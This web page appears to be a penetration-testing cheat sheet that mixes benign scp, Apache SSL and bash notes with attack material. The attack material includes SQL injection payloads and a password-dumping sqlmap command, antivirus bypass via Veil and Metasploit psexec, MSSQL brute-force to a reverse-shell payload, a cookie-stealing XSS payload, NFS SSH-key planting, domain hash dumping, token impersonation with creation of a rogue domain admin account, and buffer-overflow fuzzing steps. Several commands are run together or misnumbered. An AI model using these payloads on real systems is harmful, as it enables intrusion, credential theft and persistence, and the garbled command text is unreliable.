Skip to content



Secure Copy (scp) Cheatsheet

  • Copy remote file to local host
  • Copy local file to remote host
  • Copy local directory to remote directory
  • Copy a file from one remote host to another
  • Improve scp performance (use blowfish)

SQL Injection

Union Based SQL Injection

​' or 1=1#​1' 
ORDER BY 10#​1' UNION SELECT version(),2#​1' 
UNION SELECT version(),database()#​1' 
UNION SELECT version(),user()#​1' 
UNION ALL SELECT table_name,2 from information_schema.tables#​1' 
UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#​1' UNION ALL SELECT concat(user,char(58),password),2 from users
​​sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

AV bypass

1. Generate executable using Veil.
2. In msfconsole setup psexec with relevant payload

then follow this steps:
​msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip RHOST => ip
msf exploit(psexec) > set SMBUser userSMBUser => user
msf exploit(psexec) > set SMBPass passSMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exeEXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

1. Enabling Self signed certificates on local website1.
2. Install OpenSSL​sudo apt-get install openssl​2.
3. Run the following command to generate the self signed SSL certificates:

​sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key​3. 
4. Enable SSL for Apache​sudo a2enmod ssl​4.
5. Put the default-ssl site available creating a symbolic link:
​sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf​5
6. Edit the file default-ssl.conf
​sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf​Change
the following lines to point to the
certs:​SSLCertificateFile /etc/ssl/certs/server.crtSSLCertificateKeyFile /etc/ssl/private/server.key​6
7. Restart Apache
​sudo /etc/init.d/apache2 restart

More Information

Attacking MS-SQL

Attacking MSSQL with Metasploit

  • Enumerate MSSQL Servers on the network:
    ​msf > use auxiliary/scanner/mssql/mssql_pingnmap -sU --script=ms-sql-info ip ip
  • Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
  • Bruteforce MSSQL Database:
    ​msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
  • Enumerate MSSQL Database:
    ​msf > use auxiliary/admin/mssql/mssql_enum
  • Gain shell using gathered credentials:
    ​msf > use exploit/windows/mssql/mssql_payload
    msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp​

Bash Scripting

Simple Bash Scripting Cheatsheet

  • ctrl + y: Navigate to the previous page in nano.
  • ctrl + w: Find/search for a specific term in nano.
  • ctrl + k: Cut the current line of text in nano.
  • ctrl + x: Exit the nano editor.
  • touch file: create a new text file named "file".
  • file.ifconfig > tmp: create an empty file named "file.ifconfig" and redirect its output to "tmp".
  • nano file: open the nano editor with the file named "file".
  • ifconfig > tmp: execute the ifconfig command and save its output to the file "tmp".
  • echo >> tmp; ping -c3 >> tmp: append the output of the "ping" command to the file "tmp".
  • cat file: display the contents of the file "file".
  • more file: display the contents of the file "file" one page at a time.
  • head file: display the first 10 lines of the file "file".
  • head -15 file: display the first 15 lines of the file "file".
  • tail file: display the last 10 lines of the file "file".
  • tail -15 file: display the last 15 lines of the file "file".
  • tail -f file: continuously display the output of the file "file" (useful for log files).
  • cat tmp | grep Bcast: pipe the output of "cat tmp" to the grep command, searching for "Bcast".
  • ps aux: display all running processes for all users.
  • kill -9 PID: forcefully terminate the process with the specified PID.
  • wc -l tmp2: count the number of lines in the file "tmp2".
  • cut -d delimiter -f fields: cut fields from lines of a file based on a delimiter.
  • sort -u file: sort the contents of the file "file" and remove duplicates.
  • sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n: sort IP addresses correctly.
  • awk '{print $1}' file: display the first column of the file "file".
  • awk '{print $1,$5}' file: display the first and fifth columns of the file "file".
  • grep -v 'string' file: display lines from the file "file" that do not contain the specified string.
  • egrep -v '(string1|string2|string3)' file: display lines from the file "file" that do not contain multiple specified strings.
  • sed 's/FOO/BAR/g' file: replace all occurrences of "FOO" with "BAR" in the file "file".
  • sed 's/FOO//g' file: remove all occurrences of "FOO" from the file "file".
  • sed '/^FOO/d' file: remove lines from the file "file" that start with "FOO".
  • Set text color: echo -e "\e[1;34m This is a blue text.\e[0m"

Bash Scripts

  • Simple bash script
echo "Hello world." 
  • Make a file executable
chmod +x file
chmod 755 file 
  • Variables
echo $user
echo 'Hello' $name. 'You are running as' $user.
  • IP Address
echo "Hello World"
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)
echo "Hello" $name "Your IP address is:" $ip
  • User Input
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain
  • Check For No User Input
if [ -z $domain ]; then
echo "#########################"
echo "Invalid choice."
  • For loops
for host in $(cat hosts.txt)
command $host
  • One Liners​Port Scan
 for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done  

CTF Notes

  • Enumerate Users via Finger
  • Show nfs shares availableshowmount -e ip
  • User nfspysh to mount share and create .ssh directorynfspysh -o server=ip:/home/usermkdir .sshcd .ssh
  • Generate ssh key pair
    ssh-keygencp /tmp/authorized_keys
  • Transfer attacker public key to host
    put /tmp/authorized_keysexit
  • Login to SSH server with no password​​

​ - Start Web Service

​python -m SimpleHTTPServer 80​
- Use one of the following XSS payloads:​
    document.write('<img src="' + document.cookie + '">');

Domain Admin Exploitation

After compromising a Windows machine:

  • List the domain administrators:
    From Shell - net group "Domain Admins" /domain
  • Dump the hashes (Metasploit)
    msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
  • Find the admins (Metasploit)
    spool /tmp/enumdomainusers.txt
    msf > use auxiliary/scanner/smb/smb_enumusers_domain
    msf > set smbuser Administrator
    msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    msf > set rhosts ip/24
    msf > set threads 8
    msf > run
    ​msf> spool off

Compromise Admin's box

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministratormeterpreter > getuid
meterpreter > shell
​C:\> whoamimydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

Exploit Development Cheatsheet


​import socket
​buffer = ["A"]
counter = 50​
while len(buffer) <= 1000:    
    buffer.append("A" * counter)    
    counter = counter + 50 ​
for buffstring in buffer:    
    print "Fuzzing:" + str(len(buffstring))    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    
    sock.connect( ("", 5555) )    
Bad Character

Structured Exception Handler (SEH) Exploitation notes

  • Crash the application.
  • Check SEH overwirte (view-seh chain).
  • Find offset (!mona pattern_create ).
  • Find certain SEH references to the cyclic pattern (!mona findmsp)- Verify offset to NSEH (Next Exception).
  • Find POP/POP/RET address with mona (!mona seh -cpb ).
  • Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding).
  • Add shellcode to the payload.
  • Ensure existing padding to make sure the crash still happens.